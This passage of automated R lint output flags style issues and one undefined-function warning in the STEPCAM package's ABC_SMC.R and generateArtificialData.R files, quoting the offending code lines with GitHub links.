{\n^\n```\n[R/ABC_SMC.R:189:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:190:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L190) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n^\n```\n[R/ABC_SMC.R:191:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L191) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                          collapse = NULL), header = F)\n^\n```\n[R/ABC_SMC.R:192:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L192) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }\n^\n```\n[R/ABC_SMC.R:198:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L198) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:201:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L201) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:203:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L203) *style:* **lines should not be more than 80 characters.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:203:14:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L203) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:203:14:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L203) *warning:* **no visible global function definition for ‘calculateDistance’**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:207:9:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L207) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:207:27:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L207) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:208:9:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L208) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextDisp[numberAccepted] <- params[1]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:208:18:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L208) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextDisp[numberAccepted] <- params[1]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:9:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextFilt[numberAccepted] <- params[2]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:209:18:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextFilt[numberAccepted] <- params[2]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:210:9:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextComp[numberAccepted] <- params[3]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:210:18:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextComp[numberAccepted] <- params[3]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:212:14:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:213:9:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​        RichVec[numberAccepted] <- FRic[[1]]\n        ^~~~~~~\n```\n[R/ABC_SMC.R:213:17:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​        RichVec[numberAccepted] <- FRic[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:9:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        EveVec[numberAccepted] <- FEve[[1]]\n        ^~~~~~\n```\n[R/ABC_SMC.R:214:16:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        EveVec[numberAccepted] <- FEve[[1]]\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:9:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        DivVec[numberAccepted] <- FDiv[[1]]\n        ^~~~~~\n```\n[R/ABC_SMC.R:215:16:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        DivVec[numberAccepted] <- FDiv[[1]]\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:9:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        OptVec[numberAccepted] <- mean_optimum;\n        ^~~~~~\n```\n[R/ABC_SMC.R:216:16:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        OptVec[numberAccepted] <- mean_optimum;\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:219:11:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L219) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = 1\n          ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:219:23:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L219) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = 1\n                      ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:219:39:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L219) *style:* **Use <-, not =, for assignment.**\n```r\n​          nextWeights[numberAccepted] = 1\n                                      ^\n```\n[R/ABC_SMC.R:221:11:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] =\n          ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:23:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] =\n                      ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:39:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L221) *style:* **Use <-, not =, for assignment.**\n```r\n​          nextWeights[numberAccepted] =\n                                      ^\n```\n[R/ABC_SMC.R:222:13:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:222:53:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n                                                    ^~~~~~~~\n```\n[R/ABC_SMC.R:222:63:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n                                                              ^~~~~~~~\n```\n[R/ABC_SMC.R:223:29:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L223) *style:* **Variable and function names should be all lowercase.**\n```r\n​                            compVals, weights)\n                            ^~~~~~~~\n```\n[R/ABC_SMC.R:226:13:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L226) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:226:14:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L226) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:226:34:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L226) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:232:21:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L232) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 5)  {\n                   ~^~\n```\n[R/ABC_SMC.R:232:22:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L232) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 5)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:234:13:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L234) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:234:38:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L234) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:241:5:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L241) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- nextDisp\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:241:17:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L241) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- nextDisp\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:242:5:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L242) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- nextFilt\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:242:17:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L242) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- nextFilt\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:243:5:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L243) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- nextComp\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:243:17:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L243) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- nextComp\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:244:16:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L244) *style:* **Variable and function names should be all lowercase.**\n```r\n​    weights <- nextWeights\n               ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:246:21:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L246) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                    ^~~~~~~~\n```\n[R/ABC_SMC.R:246:31:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L246) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                              ^~~~~~~~\n```\n[R/ABC_SMC.R:246:41:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L246) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                                        ^~~~~~~~\n```\n[R/ABC_SMC.R:246:51:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L246) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                                                  ^~~~~~~\n```\n[R/ABC_SMC.R:247:21:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                    ^~~~~~\n```\n[R/ABC_SMC.R:247:29:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                            ^~~~~~\n```\n[R/ABC_SMC.R:247:37:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                                    ^~~~~~\n```\n[R/ABC_SMC.R:248:54:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L248) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:251:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L251) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:251:19:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L251) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                  ^~~~~~~~\n```\n[R/ABC_SMC.R:251:35:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L251) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:251:51:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L251) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:252:9:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:252:32:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L252) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:252:37:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n                                    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:255:5:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L255) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextWeights <- rep(1,numParticles)\n    ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:255:26:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L255) *style:* **Commas should always have a space after.**\n```r\n​    nextWeights <- rep(1,numParticles)\n                         ^\n```\n[R/ABC_SMC.R:255:26:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L255) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextWeights <- rep(1,numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:256:5:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L256) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextDisp <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:256:19:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L256) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextDisp <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:257:5:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextFilt <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:257:19:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextFilt <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:258:5:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L258) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextComp <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:258:19:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L258) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextComp <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:265:61:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L265) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 2, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:269:63:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L269) *style:* **Put spaces around all infix operators.**\n```r\n​      d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                             ~^~\n```\n[R/ABC_SMC.R:272:15:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L272) *style:* **Put spaces around all infix operators.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n             ~^~~\n```\n[R/ABC_SMC.R:273:44:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/ABC_SMC.R#L273) *style:* **Put spaces around all infix operators.**\n```r\n​\t                          collapse = NULL), header = F)\n                                          ~^\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = 